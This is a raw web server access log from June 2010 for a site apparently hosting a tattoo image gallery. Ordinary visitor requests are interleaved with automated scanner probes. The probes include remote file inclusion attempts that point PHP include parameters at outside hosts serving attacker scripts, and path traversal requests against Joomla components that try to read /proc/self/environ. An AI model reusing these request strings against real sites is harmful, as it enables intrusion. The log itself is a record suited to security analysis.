89.238.145.196 - - [01/Jun/2010:05:12:31 -0500] "GET /logs/access_log.1271548800/lostpasswd.php?env[include_prefix]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.146.255.196 - - [01/Jun/2010:05:12:45 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.58.188.125 - - [01/Jun/2010:05:13:29 -0500] "GET /logs/access_log.1205107200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.811"
207.58.188.125 - - [01/Jun/2010:05:13:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
207.58.188.125 - - [01/Jun/2010:05:13:47 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
94.23.11.114 - - [01/Jun/2010:05:14:34 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.238.145.196 - - [01/Jun/2010:05:14:42 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:05:14:43 -0500] "GET /logs/access_log.1271548800/lostpasswd.php?env[include_prefix]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:05:14:43 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.43.66 - - [01/Jun/2010:05:14:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:14:53 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:14:53 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
88.191.94.188 - - [01/Jun/2010:05:15:42 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [01/Jun/2010:05:15:42 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [01/Jun/2010:05:15:42 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [01/Jun/2010:05:15:47 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.94.188 - - [01/Jun/2010:05:15:47 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.94.188 - - [01/Jun/2010:05:15:47 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.146.255.196 - - [01/Jun/2010:05:16:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [01/Jun/2010:05:16:31 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [01/Jun/2010:05:16:32 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.43.66 - - [01/Jun/2010:05:16:58 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
85.153.27.146 - - [01/Jun/2010:05:17:20 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:05:17:27 -0500] "GET //index.php?option=com_gcalendar&view=gcalendar&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:05:17:28 -0500] "GET //index.php?option=com_gcalendar&view=gcalendar&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
218.146.255.196 - - [01/Jun/2010:05:17:59 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.144.5.251 - - [01/Jun/2010:05:18:20 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:20 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:21 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:21 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:21 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:23 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:31 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:32 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:33 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:41 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:42 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:42 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:42 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:42 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:56 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:57 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:57 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:57 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:18:59 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
94.23.11.114 - - [01/Jun/2010:05:19:01 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:05:19:02 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:05:19:02 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:10 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:11 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:11 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:11 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:25 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:25 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:25 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:25 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:37 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
203.144.5.251 - - [01/Jun/2010:05:19:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
74.55.43.66 - - [01/Jun/2010:05:20:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:20:43 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:20:43 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:20:49 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
94.23.11.114 - - [01/Jun/2010:05:23:15 -0500] "GET /logs/access_log.1274832000/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:05:23:15 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:05:23:15 -0500] "GET /logs/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.55.43.66 - - [01/Jun/2010:05:23:28 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [01/Jun/2010:05:23:28 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.204.239 - - [01/Jun/2010:05:25:26 -0500] "GET /logs/access_log.1163721600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.67.240.189 - - [01/Jun/2010:05:25:27 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:05:25:28 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:05:26:34 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:05:26:35 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
85.153.27.146 - - [01/Jun/2010:05:26:56 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
194.100.228.237 - - [01/Jun/2010:05:27:33 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:05:27:33 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:05:27:34 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:05:27:34 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7797 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:05:27:34 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:05:27:34 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
87.250.255.243 - - [01/Jun/2010:05:27:55 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
